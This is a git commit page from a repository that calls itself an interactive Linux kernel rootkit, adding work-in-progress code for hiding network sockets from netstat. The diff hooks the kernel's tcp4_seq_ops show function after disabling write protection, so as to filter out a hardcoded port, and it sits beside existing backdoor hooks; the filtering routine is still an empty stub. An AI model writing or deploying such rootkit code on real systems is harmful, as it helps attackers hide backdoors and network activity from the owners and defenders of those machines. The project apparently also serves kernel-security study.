WIP Add initial code for netstat sockhiding - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit e1466a6380dc21f48816d4c0931cd5a7b8f12334
parent 8405e52af84657fbe0be4b5e1f96d5a0b5659bb3
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat, 12 Dec 2020 00:35:55 +0100

WIP Add initial code for netstat sockhiding

Diffstat:
M src/hook.c  | 5 +++++
A src/sockhide.c  | 65 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/sockhide.h  | 3 +++

3 files changed, 73 insertions(+), 0 deletions(-)
diff --git a/src/hook.c b/src/hook.c
@@ -20,6 +20,7 @@
 #include "pidhide.h"
 #include "openhide.h"
 #include "read.h"
+#include "sockhide.h"
 
 extern rootkit_t rootkit;
 
@@ -79,6 +80,8 @@ init_hooks(void)
         backdoor_read();
     else if (rootkit.backdoor == BD_TTY)
         backdoor_tty();
+
+    hook_show();
 }
 
 void
@@ -100,6 +103,8 @@ remove_hooks(void)
 
     if (rootkit.backdoor != BD_OFF)
         unbackdoor();
+    
+    unhook_show();
 }
 
 void
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -0,0 +1,65 @@
+#include <linux/kernel.h>
+#include <linux/seq_file.h>
+
+#include "common.h"
+#include "hook.h"
+
+#define SIZE_PORT_COLON 6
+
+typedef unsigned short port_t;
+
+static port_t to_hide = 41821;
+
+static int (*tcp4_seq_show)(struct seq_file *seq, void *v);
+static int (*udp4_seq_show)(struct seq_file *seq, void *v);
+static int (*tcp6_seq_show)(struct seq_file *seq, void *v);
+static int (*udp6_seq_show)(struct seq_file *seq, void *v);
+
+static int g7_tcp4_seq_show(struct seq_file *seq, void *v);
+
+void
+hook_show(void)
+{
+    tcp4_seq_show 
+        = ((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show;
+
+    disable_protection();
+    ((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show
+        = (void *)g7_tcp4_seq_show;
+    enable_protection();
+    
+    DEBUG_INFO("tcp4 show has been hooked!\n");
+}
+
+void
+unhook_show(void)
+{
+    disable_protection();
+    ((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show
+        = (void *)tcp4_seq_show;
+    enable_protection();
+}
+
+static void
+hide_netstat(char *port, struct seq_file *seq)
+{
+
+}
+
+//seq includes all the info we need
+//https://elixir.bootlin.com/linux/v4.19/source/include/linux/seq_file.h#L16
+static int
+g7_tcp4_seq_show(struct seq_file *seq, void *v)
+{
+    int ret = tcp4_seq_show(seq, v);
+
+    //Ports are displayed as uppercase hex
+    //Since we don't want to detect random hex strings, we add the colon
+    char hex_port[SIZE_PORT_COLON];
+    sprintf(hex_port, ":%04X", to_hide);
+
+    if(strstr(seq->buf, hex_port))
+       hide_netstat(hex_port, seq);
+    
+    return ret;
+}
diff --git a/src/sockhide.h b/src/sockhide.h
@@ -0,0 +1,2 @@
+void hook_show(void);
+void unhook_show(void);
+\ No newline at end of file

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs

M	src/hook.c	\|	5	+++++
A	src/sockhide.c	\|	65	+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A	src/sockhide.h	\|	3	+++